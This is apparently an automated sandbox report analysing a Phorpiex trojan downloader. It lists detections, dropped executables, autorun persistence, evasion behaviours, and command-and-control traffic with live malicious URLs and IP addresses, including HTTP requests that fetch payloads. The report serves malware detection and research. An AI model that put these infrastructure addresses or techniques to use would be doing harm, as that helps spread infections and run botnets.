Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
Analysis ID:1438295
MD5:0a547347b0b9af0290b263dfa8d71ebe
SHA1:5ff176bfe5e0255a68c8e3d132afbff795a1fc1d
SHA256:b00aa26d9d7889613c7552ce6e17b0264788e24c6166edcf68c47f209ca767f8
Tags:exePhorpiex
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Phorpiex
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Contains functionality to determine the online IP of the system
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe (PID: 6832 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe" MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
    • sysbrapsvc.exe (PID: 5588 cmdline: C:\Windows\sysbrapsvc.exe MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
      • 3193211493.exe (PID: 3640 cmdline: C:\Users\user\AppData\Local\Temp\3193211493.exe MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
      • 1146722911.exe (PID: 2060 cmdline: C:\Users\user\AppData\Local\Temp\1146722911.exe MD5: D085F41FE497A63DC2A4882B485A2CAF)
        • 2303012543.exe (PID: 3324 cmdline: C:\Users\user\AppData\Local\Temp\2303012543.exe MD5: 9B8A3FB66B93C24C52E9C68633B00F37)
        • 2711236308.exe (PID: 4936 cmdline: C:\Users\user\AppData\Local\Temp\2711236308.exe MD5: 9B8A3FB66B93C24C52E9C68633B00F37)
        • 1245832676.exe (PID: 1464 cmdline: C:\Users\user\AppData\Local\Temp\1245832676.exe MD5: 9B8A3FB66B93C24C52E9C68633B00F37)
      • 2006625995.exe (PID: 3628 cmdline: C:\Users\user\AppData\Local\Temp\2006625995.exe MD5: 802C60DB52BD6C4DB699A74F63A00D8D)
      • 330125677.exe (PID: 2068 cmdline: C:\Users\user\AppData\Local\Temp\330125677.exe MD5: 11D2F27FB4F0C424AB696573E79DB18C)
      • 300129380.exe (PID: 4820 cmdline: C:\Users\user\AppData\Local\Temp\300129380.exe MD5: CAFD277C4132F5D0F202E7EA07A27D5C)
  • sysbrapsvc.exe (PID: 768 cmdline: "C:\Windows\sysbrapsvc.exe" MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
  • winploravr.exe (PID: 3020 cmdline: "C:\Users\user\winploravr.exe" MD5: D085F41FE497A63DC2A4882B485A2CAF)
  • winploravr.exe (PID: 6368 cmdline: "C:\Windows\winploravr.exe" MD5: D085F41FE497A63DC2A4882B485A2CAF)
  • winploravr.exe (PID: 2796 cmdline: "C:\Users\user\winploravr.exe" MD5: D085F41FE497A63DC2A4882B485A2CAF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\sysbrapsvc.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Temp\3193211493.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        SourceRuleDescriptionAuthorStrings
        00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  Click to see the 9 entries
                  SourceRuleDescriptionAuthorStrings
                  5.0.3193211493.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    2.2.sysbrapsvc.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      2.0.sysbrapsvc.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          5.2.3193211493.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            Click to see the 3 entries
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\winploravr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1146722911.exe, ProcessId: 2060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 67.195.228.94, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\2006625995.exe, Initiated: true, ProcessId: 3628, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49720
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysbrapsvc.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, ProcessId: 6832, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                            Timestamp:05/08/24-15:22:40.436270
                            SID:2044077
                            Source Port:53100
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:45.471815
                            SID:2837677
                            Source Port:80
                            Destination Port:49713
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:46.732432
                            SID:2837677
                            Source Port:80
                            Destination Port:49715
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:49.024024
                            SID:2837677
                            Source Port:80
                            Destination Port:49717
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:48.428846
                            SID:2837677
                            Source Port:80
                            Destination Port:49716
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:30.416735
                            SID:2044077
                            Source Port:53100
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:35.420978
                            SID:2044077
                            Source Port:53100
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:05/08/24-15:22:25.401623
                            SID:2044077
                            Source Port:53100
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeAvira: detected
                            Source: http://twizt.net/ALLSTATAoAvira URL Cloud: Label: phishing
                            Source: http://185.215.113.66/5PAvira URL Cloud: Label: malware
                            Source: http://twizt.net/Avira URL Cloud: Label: phishing
                            Source: http://twizt.net/ALLSTATAopen%temp%%sAvira URL Cloud: Label: phishing
                            Source: http://185.215.113.66/2HAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/2OAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/6Avira URL Cloud: Label: malware
                            Source: http://twizt.net/ALLSTATAntAvira URL Cloud: Label: phishing
                            Source: http://185.215.113.66/3TAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/1AAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/derAvira URL Cloud: Label: malware
                            Source: http://193.233.132.177/_3Avira URL Cloud: Label: malware
                            Source: http://twizt.net/ALLSTATAWaIG2Avira URL Cloud: Label: phishing
                            Source: http://185.215.113.66/3KKC:Avira URL Cloud: Label: malware
                            Source: http://twizt.net/ALLSTATAAvira URL Cloud: Label: phishing
                            Source: http://twizt.net/ALLSTATA7aAvira URL Cloud: Label: phishing
                            Source: C:\Windows\sysbrapsvc.exeAvira: detection malicious, Label: HEUR/AGEN.1360619
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeAvira: detection malicious, Label: HEUR/AGEN.1360619
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeReversingLabs: Detection: 95%
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeReversingLabs: Detection: 29%
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeReversingLabs: Detection: 29%
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeReversingLabs: Detection: 29%
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeReversingLabs: Detection: 37%
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeReversingLabs: Detection: 78%
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeReversingLabs: Detection: 62%
                            Source: C:\Users\user\winploravr.exeReversingLabs: Detection: 95%
                            Source: C:\Windows\sysbrapsvc.exeReversingLabs: Detection: 78%
                            Source: C:\Windows\winploravr.exeReversingLabs: Detection: 95%
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeReversingLabs: Detection: 78%
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\winploravr.exeJoe Sandbox ML: detected
                            Source: C:\Windows\sysbrapsvc.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\winploravr.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeJoe Sandbox ML: detected
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040C330
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040C330
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040C330
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,5_2_0040C330
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB1000 CryptAcquireContextW,7_2_00DB1000
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,RtlAllocateHeap,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,FindCloseChangeNotification,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,7_2_00DB1100
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,7_2_00DB1020
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,9_2_002A1020
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A1000 CryptAcquireContextW,9_2_002A1000
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,9_2_002A1100
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F1000 CryptAcquireContextW,14_2_000F1000
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,14_2_000F1100
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,14_2_000F1020

                            Phishing

                            barindex
                            Source: Yara matchFile source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, type: SAMPLE
                            Source: Yara matchFile source: 5.0.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe PID: 6832, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysbrapsvc.exe PID: 5588, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysbrapsvc.exe PID: 768, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3193211493.exe PID: 3640, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\sysbrapsvc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3193211493.exe, type: DROPPED
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00406650
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406510
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00406650
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406510
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_00406650
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406510
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00406650
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406510

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 10.102.10.21:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 189.222.182.86:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 2.133.220.58:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 100.82.121.252:40500
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49713
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49715
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49716
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49717
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com0_2_0040AF30
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com2_2_0040AF30
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040AF30
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com5_2_0040AF30
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D717D0 InternetOpenA,InternetOpenUrlA,InternetReadFile,wsprintfA,wsprintfA,InternetCloseHandle,wsprintfA,InternetCloseHandle, http://icanhazip.com/10_2_00D717D0
                            Source: unknownNetwork traffic detected: IP country count 18
                            Source: global trafficTCP traffic: 192.168.2.8:49709 -> 37.151.73.50:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49714 -> 93.117.37.145:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49725 -> 212.154.184.158:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49736 -> 82.194.11.2:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49746 -> 77.240.41.3:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49773 -> 201.171.26.123:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49783 -> 111.9.3.39:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49798 -> 88.204.241.110:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49810 -> 187.250.131.80:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 189.222.182.86:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 2.133.220.58:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 100.82.121.252:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 92.124.152.236:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 93.123.145.179:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.236.218.241:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.218.238.106:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 85.204.86.26:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.236.219.106:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 37.120.247.6:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 92.47.124.54:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 102.130.192.212:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 91.92.206.184:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 109.168.235.213:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 187.235.148.47:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 187.133.57.73:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 88.135.33.186:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 94.141.69.176:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 189.186.73.73:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.219.223.67:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 87.237.239.65:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 2.191.74.251:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 92.47.251.85:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 82.200.224.194:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 95.156.103.50:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 80.80.214.50:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 82.194.10.40:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 2.180.211.255:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 186.94.185.219:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 5.255.18.13:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 2.190.51.122:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 217.164.211.207:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 41.199.184.238:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 5.235.233.254:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 5.219.253.209:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.106.236.58:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 100.111.103.217:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.249.62.87:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 2.185.146.181:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 146.70.53.161:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 84.53.244.106:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 190.36.195.147:40500
                            Source: Joe Sandbox ViewASN Name: KAZTELECOM-ASKZ KAZTELECOM-ASKZ
                            Source: global trafficTCP traffic: 192.168.2.8:49720 -> 67.195.228.94:25
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
